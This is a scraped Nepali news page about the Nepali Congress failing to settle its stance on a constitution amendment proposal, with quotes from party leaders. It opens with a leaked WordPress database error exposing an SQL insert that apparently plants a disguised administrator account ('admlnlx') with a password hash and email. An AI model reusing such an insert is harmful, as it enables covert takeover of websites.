WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9naCeThEjxbQQRBJL7.bRxNv84F8b1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 08:01:16', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २१-
सरकारले व्यवस्थापिका–संसद सचिवालयमा संविधान संशोधन प्रस्ताव दर्ता गराएको एक साता वितिसक्दा पनि सत्तारुढ दल नेपाली कांग्रेसले संशोधनबारे पार्टीको आधिकारिक धारणा तय गर्नै सकेको छैन ।
नेपाली कांग्रैसका नेताहरुले संविधान संशोधन प्रस्ताव व्यवस्थापिका संसद सचिवालयमा दर्ता भएको र संसदमा समेत प्रवेश गरेकाले विधिवतढंगबाट टुंगो लगाउनुपर्ने विभिन्न औपचारिक कार्यक्रममा बताउँदै आएका छन् ।
कांग्रेसका शीर्ष नेताहरु देश दौडाहामा लागेर आ आफ्नो भनाइ सार्वजनिक गर्नेवाहेक संस्थागत धारणा तय गर्न नेतृत्वले बैठक नडाकेकोप्रति नेताहरुले असन्तुष्टि व्यक्त गरेका आजको राजधानी दैनिकमा समाचार छ ।
कांग्रेसको प्रत्यक्ष सहमतिमा संविधान संशोधन प्रस्ताव दर्ता भए पनि त्यसमा पार्टीभित्रै धेरै नेताको विमति रहेको कांग्रेस नेता रामशरण महतले बताए ।